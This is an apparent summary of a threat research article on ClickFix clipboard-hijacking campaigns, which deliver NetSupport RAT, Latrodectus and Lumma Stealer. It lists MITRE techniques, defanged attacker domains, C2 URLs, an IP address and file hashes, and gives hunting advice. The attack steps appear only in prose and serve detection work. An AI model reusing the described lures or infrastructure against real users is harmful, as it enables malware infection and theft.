Threat Research

Fix the Click: Preventing the ClickFix Attack Vector

Unit42
Fix the Click: Preventing the ClickFix Attack Vector

The article explores the rising threat of ClickFix campaigns, detailing how attackers use social engineering to trick users into executing malicious commands across various industries in 2025. It highlights prominent campaigns delivering NetSupport RAT, Latrodectus, and Lumma Stealer malware and provides hunting and mitigation strategies to combat these threats. #ClickFix #NetSupportRAT #Latrodectus #LummaStealer

Keypoints

  • ClickFix is a social engineering technique that tricks users into manually running malicious commands via clipboard hijacking and “pastejacking.”
  • Prominent ClickFix campaigns in 2025 include those distributing NetSupport RAT, Latrodectus malware, and Lumma Stealer, affecting industries such as healthcare, legal services, automotive, and energy.
  • NetSupport RAT campaigns use fake landing pages mimicking DocuSign and Okta to lure victims and employ a new loader that sideloads malicious DLLs for stealthy infections.
  • Latrodectus campaigns leverage compromised websites and ClearFake infrastructure to redirect victims to fake verification pages that inject malicious PowerShell commands for initial access.
  • Lumma Stealer campaigns utilize typosquatted IP Logger domains and AutoIt scripting for payload delivery and execution, with wide industry targeting.
  • Hunting ClickFix infections involves monitoring RunMRU registry keys for suspicious commands and detecting Win+X terminal-based executions with correlating event logs and clipboard activity.
  • Palo Alto Networks provides protection through Advanced WildFire, Advanced URL Filtering, DNS Security, Cortex XDR, and XSIAM with behavioral threat protection against these campaigns.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – ClickFix lures inject malicious commands into the clipboard for users to paste into Run or terminal windows (‘the malicious JavaScript backend injects a PowerShell command into the endpoint’s clipboard’).
  • [T1543] Create or Modify System Process – The NetSupport RAT loader creates scheduled tasks to maintain persistence (‘the loader then sets up persistence for the RAT by creating a scheduled task’).
  • [T1129] Shared Modules – NetSupport RAT loader sideloads a malicious DLL using a legitimate executable (‘jp2launcher.exe sideloads a malicious loader named msvcp140.dll’).
  • [T1204] User Execution – The attacks rely on social engineering to trick users into manually running malicious commands (‘ClickFix technique tricks potential victims into executing malicious commands’).
  • [T1071] Application Layer Protocol – Downloading payloads via HTTP/HTTPS from attacker-controlled domains (‘the DLL downloads encrypted binaries from the C2 server via curl.exe’).
  • [T1056] Input Capture – Clipboard hijacking used to inject malicious commands (‘webpages using ClickFix inject malicious script or commands into a potential victim’s clipboard’).
  • [T1036] Masquerading – Use of fake landing pages mimicking legitimate services like DocuSign and Okta (‘fake DocuSign and Okta landing pages’).
  • [T1055] Process Injection – Latrodectus injects shellcode into sideloaded legitimate binaries (‘the legitimate file side-loads the malicious DLL for Latrodectus, it injects shellcode into itself’).

Indicators of Compromise

  • [SHA256 Hashes] Examples from Lumma Stealer – PartyContinued.exe: 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef; Boat.pst (CAB file): 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7
  • [Domains] Lumma Stealer campaign – iplogger[.]co, stuffgull[.]top, sumeriavgv[.]digital, and pub-*.r2[.]dev domains
  • [SHA256 Hashes] Examples from Latrodectus – libecf.dll: 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1; PowerShell downloader: 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293
  • [C2 URLs] Latrodectus examples – hxxps[:]//webbs[.]live/on/, hxxps[:]//diab[.]live/up/, hxxps[:]//mhbr[.]live/do/, and others ending with .live domains
  • [SHA256 Hashes] NetSupport RAT loader samples – data_3.bin: 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D, msvcp140.dll loader: CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527
  • [Domains] NetSupport RAT loader distribution – oktacheck.it[.]com, docusign.sa[.]com, doccsign.it[.]com, loyalcompany[.]net
  • [IP Address] NetSupport RAT example – 80.77.23[.]48 associated with C2 server and download requests

Read more: https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/